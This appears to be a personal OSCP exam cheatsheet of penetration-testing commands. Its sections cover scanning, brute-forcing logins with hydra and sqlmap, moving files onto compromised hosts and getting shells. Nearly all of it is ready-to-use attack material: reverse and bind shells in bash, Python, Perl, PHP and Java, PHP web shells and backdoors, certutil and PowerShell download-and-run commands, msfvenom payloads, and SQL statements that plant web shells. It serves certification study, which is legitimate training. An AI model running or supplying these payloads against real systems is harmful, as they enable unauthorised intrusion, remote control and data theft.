The following collection is a wild (but structured) selection of commands, snippets, links, exploits, tools, lists and techniques I personally tested and used on my journey to becoming an OSCP. I will extend, restructure and update it from time to time, so let's see where this is going.
THIS IS WORK IN PROGRESS
This cheatsheet is definitely not "complete". I am sure i forgot to write down hundreds of essential commands, used most of them in the wrong way with unnessecary flags and you'll probably soon ask yourself how i've even made it through the exam. Also you might think a certain tool used should be in another phase of the attack (e.g certain nmap vulnerabitly scripts should be in Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help to improve the list. There are a number of tools you are not allowed to use during your OSCP exam. At the time of writing, sqlmap is one of them. Check which tools are restricted/banned before you use them in your exam. You can find detailed information about tool usage in the exam guidelines. Use for educational purposes only!
- OSCP Cheatsheet
- Reconnaissance
- Brute Force
- File Transfer
- Shells
https://github.com/Tib3rius/AutoRecon
autorecon -vv 192.168.0.1nmap -v -sS -sV -Pn --top-ports 1000 -oA initial_scan_192.168.0.1 192.168.0.1nmap -v -sS -Pn -sV -p 0-65535 -oA full_scan_192.168.0.1 192.168.0.1If the syn scan is taking very long to complete, the following command is an alternative (no service detection).
nmap -sT -p- --min-rate 5000 --max-retries 1 192.168.0.1nmap -v -sU -T4 -Pn --top-ports 100 -oA top_100_UDP_192.168.0.1 192.168.0.1nmap -v -sS -Pn --script vuln --script-args=unsafe=1 -oA full_vuln_scan_192.168.0.1 192.168.0.1nmap -v -sS -Pn --script nmap-vulners -oA full_vuln_scan_192.168.0.1 192.168.0.1nmap -v -sS -p 445,139 -Pn --script smb-vuln* --script-args=unsafe=1 -oA smb_vuln_scan_192.168.0.1 192.168.0.1gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirb/big.txt -t 20gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,cgi,sh,bak,aspx -t 20Set the --insecuressl flag.
To fix NT_STATUS_CONNECTION_DISCONNECTED errors in new Kali installations add client min protocol = NT1 to your \etc\samba\smb.conf file.
smbclient -U guest -L 192.168.0.1smbclient \\\\192.168.0.1\\Users -U c.smithsmbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *'
example:
smbclient \\\\192.168.0.1\\Data -U John -c 'prompt OFF;recurse ON;cd '\Users\John\';lcd '/tmp/John';mget *'smbclient \\\\192.168.0.1\\Data -U John -c 'allinfo "\Users\John\file.txt"'smbclient \\\\192.168.0.1\\Data -U John
get "\Users\John\file.txt:SECRET:$DATA"enum4linux 192.168.0.1enum4linux 192.168.0.1 | grep -Ev '^(Use of)' > enum4linux.out showmount -e 192.168.0.1mkdir mpt
mount -t nfs -o soft 192.168.0.1:/backup mpt/https://github.com/pwnwiki/webappdefaultsdb/blob/master/README.md
DISCLAIMER: There are a number of tools you are not allowed to use in your OSCP exam. At the time of writing, sqlmap is one of them. Check which tools are restricted/banned before you use them during your exam. You can find detailed information about tool usage in the exam guidelines.
sqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batchsqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batch --level=5 --risk=3sqlmap --all -r post_request.txt --batch sqlmap --all -r post_request.txt --batch --level=5 --risk=3sqlmap -r post_request.txt --dbms "mysql" --os-shellhydra -l admin -V -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.0.1 http-get /phpmyadmin/ -t 15hydra 192.168.0.1 -V -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t 15Check request in BURP to see Post parameters. -l or -L has to be set, even if there is no user to login with!. Use https-post-form instead of http-post-form for HTTPS sites.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t 15Change MYDATABASENAME. Default databasename is mysql.
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv mysql://192.168.0.1:3306/MYDATABASENAME -t 15powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.1:80/winprivesc/JuicyPotato.exe','C:\Users\john\Desktop\juicy.exe')Very helpful for chars that need to be escaped otherwise.
$Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")'
$Encoded = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($command))
powershell.exe -NoProfile -encoded $Encodedcertutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exeos.execute('cmd.exe /c certutil.exe -urlcache -split -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe & C:\Windows\Temp\shell.exe')impacket-smbserver -smb2support server_name /var/www/htmlnet view \\192.168.0.1copy \\192.168.0.1\server_name\shell.exe shell.exeapt-get update && apt-get install pure-ftpd#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd myftpuser -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/40PureDBexit
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart./setupftp.shpure-pw passwd offsec -f /etc/pure-ftpd/pureftpd.passwdpure-pw mkdb/etc/init.d/pure-ftpd restart echo open 192.168.0.1>> ftp.txt
echo USER myftpuser>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo put secret_data.txt>> ftp.txt
echo bye >> ftp.txtftp -v -n -s:ftp.txtnc -l -p 1234 > out.filenc -w 3 192.168.0.1 1234 < out.fileatftpd --daemon --port 69 /var/tftptftp -i 192.168.0.1 GET whoami.exeecho strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbscscript wget.vbs http://192.168.0.1/nc.exe nc.exepython -c 'import pty;pty.spawn("/bin/bash");' - In your active shell press
bgto send your nc session to background - Enter
stty raw -echo - Enter
fgto bring your nc session to foreground - Enter
export TERM=xterm-256color
rlwrap enables the usage of arrow keys in your shell. https://github.com/hanslub42/rlwrap
rlwrap nc -nlvp 4444Victim:
nc 192.168.0.1 4444 -e /bin/bashIf -e is not allowed, try to find other versions of netcat
/bin/nc
/usr/bin/ncat
/bin/netcat
/bin/nc.traditionalAttacker:
rlwrap nc -nlvp 4444nc 192.168.0.1 4444 -e cmd.exeVictim:
nc -nlvp 4444 -e /bin/bashAttacker:
nc 192.168.0.1 4444Victim:
nc -nlvp 4444 -e cmd.exeAttacker:
nc 192.168.0.1 4444/bin/bash -i >& /dev/tcp/192.168.0.1/4433 0>&1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])cat /usr/share/webshells/php/php-reverse-shell.phpcat /usr/share/webshells/php/php-backdoor.phpVersion 1:
<?php echo shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1");?>Version 2:
<?php $sock=fsockopen("192.168.0.1", 4444);exec("/bin/sh -i <&3 >&3 2 >& 3");?>As Command:
php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'<?php echo system($_REQUEST["cmd"]); ?>Call the CMD shell:
http://192.168.0.1/cmd_shell.php?cmd=whoamihttps://github.com/WhiteWinterWolf/wwwolf-php-webshell
Reverse Shell:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exeBind Shell:
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exeOutput in Hex, C Style, Exclude bad chars, Exitfunction thread:
msfvenom -p windows/shell_bind_tcp LHOST=192.168.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windowsReverse Shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exeBind Shell:
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exeMeterpreter:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exeReverse Shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elfBind Shell:
msfvenom -p linux/x86/shell/bind_tcp LHOST=192.168.0.1 -f elf > bind_shell.elfReverse Shell:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elfBind Shell:
msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf > rev_shell.elfmsfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.1 LPORT=4444 -f raw > shell.jspAs .war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f war -o shell.warmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f aspx -o rev_shell.aspx<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%><%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c C:\Windows\Temp\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>String host="192.168.0.1";
int port=4444;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();String host="192.168.0.1";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();perl -MIO -e 'use Socket;$ip="192.168.0.1";$port=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Write a CMD shell into a file with the right permissions. Issue the following select. (Try different paths for different webservers)
Windows:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"Unix:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"